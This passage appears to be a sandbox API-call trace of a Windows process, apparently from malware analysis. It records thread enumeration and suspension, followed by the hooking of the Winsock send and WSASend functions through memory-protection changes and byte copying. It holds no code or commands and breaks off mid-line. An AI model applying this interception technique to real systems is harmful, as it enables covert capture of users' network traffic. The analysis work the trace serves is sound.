[0176.294] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.295] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.295] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.295] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.295] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.296] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.296] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.296] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.297] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.297] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.297] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.297] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.298] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.298] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.298] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.298] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.299] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.299] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.299] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.300] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.300] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.300] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.300] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.301] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.301] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.301] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.302] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.302] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.302] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.302] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.303] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.303] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.303] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.303] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.304] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.398] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.398] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.398] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.399] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.399] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.399] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.400] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.400] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.400] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.400] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.401] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.401] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.401] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.401] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.402] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.402] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.402] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.403] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.403] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.403] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.403] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.404] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.404] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.404] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.404] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.405] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.405] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.405] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.406] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.406] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.406] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.406] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.407] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.407] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.407] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.407] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.408] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.408] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.408] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.409] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.409] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.409] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.409] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.410] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.410] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.410] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.410] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.411] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.411] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.411] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.412] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.412] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.412] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.412] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.413] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.413] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.413] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.413] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.414] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.414] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.414] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.415] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.415] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.415] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.415] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.416] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.416] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.416] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.416] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.417] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.417] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.417] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.418] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.418] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.418] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.418] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.419] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.419] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.419] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.419] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.420] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.420] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.420] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.421] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.421] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.421] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.421] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.422] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.422] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.422] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.422] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.423] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.423] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.423] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.424] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.424] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.424] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.424] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.425] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.425] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.425] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.425] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.426] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.426] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.426] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.427] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.427] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.427] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.427] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.428] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.428] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.428] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.428] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.429] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.429] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.429] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.430] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.430] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.540] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7e4) returned 0xa0 [0176.540] SuspendThread (hThread=0xa0) returned 0x0 [0176.540] CloseHandle (hObject=0xa0) returned 1 [0176.540] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x98c) returned 0xa0 [0176.540] SuspendThread (hThread=0xa0) returned 0x0 [0176.541] CloseHandle (hObject=0xa0) returned 1 [0176.561] CloseHandle (hObject=0x9c) returned 1 [0176.561] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0176.561] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0176.561] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x144224 | out: lpflOldProtect=0x144224*=0x20) returned 1 [0176.562] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x150000 [0176.562] RtlMoveMemory (in: Destination=0x150000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x150000) [0176.562] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x144224 | out: lpflOldProtect=0x144224*=0x40) returned 1 [0176.568] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0176.568] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0176.568] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x144224 | out: lpflOldProtect=0x144224*=0x20) returned 1 [0176.568] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x280000 [0176.569] RtlMoveMemory (in: Destination=0x280000, Source=0x75bc4406, Length=0x5 | out: Destination=0x280000) [0176.569] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x144224 | out: lpflOldProtect=0x144224*=0x40) returned 1 [0176.593] GetCurrentProcessId () returned 0x7fc [0176.593] GetCurrentThreadId () returned 0x760 [0176.593] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x9c [0176.594] Thread32First (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.595] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.595] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.595] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.595] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.596] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.596] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.596] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.596] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.597] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.597] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.597] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.598] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.598] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.598] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.598] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.599] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.599] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.599] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.599] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.600] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.600] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.600] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.601] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.601] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.601] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.602] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.602] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.602] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.603] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.603] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.603] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.603] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.604] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.604] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.604] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.605] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.605] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.605] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.605] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.606] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.606] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.606] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.606] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.607] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.607] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.607] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.607] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.608] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.608] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.608] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.609] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.609] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.609] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.609] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.610] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.610] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.610] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.611] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.611] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.611] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.611] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.612] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.612] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.612] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.612] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.613] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.613] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.613] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.614] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.614] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.614] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.614] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.615] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.615] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.615] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.616] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.616] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.616] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.616] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.617] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.617] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.617] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.617] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.618] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.618] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.618] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.619] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.619] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.619] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.619] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.620] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.620] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.620] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.620] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.621] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.621] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.621] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.622] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.622] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.622] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.622] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.623] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.623] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.623] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.623] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.624] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.624] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.624] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.625] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.625] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.625] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.625] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.626] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.626] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.626] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.627] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.627] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.627] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.627] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.628] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.628] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.628] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.628] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.629] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.629] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.629] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.630] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.630] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.630] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.630] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.631] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.631] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.631] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.631] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.681] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.681] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.681] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.682] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.682] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.682] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.682] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.683] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.683] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.683] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.684] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.684] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.684] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.684] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.685] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.685] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.685] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.686] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.686] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.686] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.686] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.687] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.687] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.687] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.687] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.688] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.688] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) 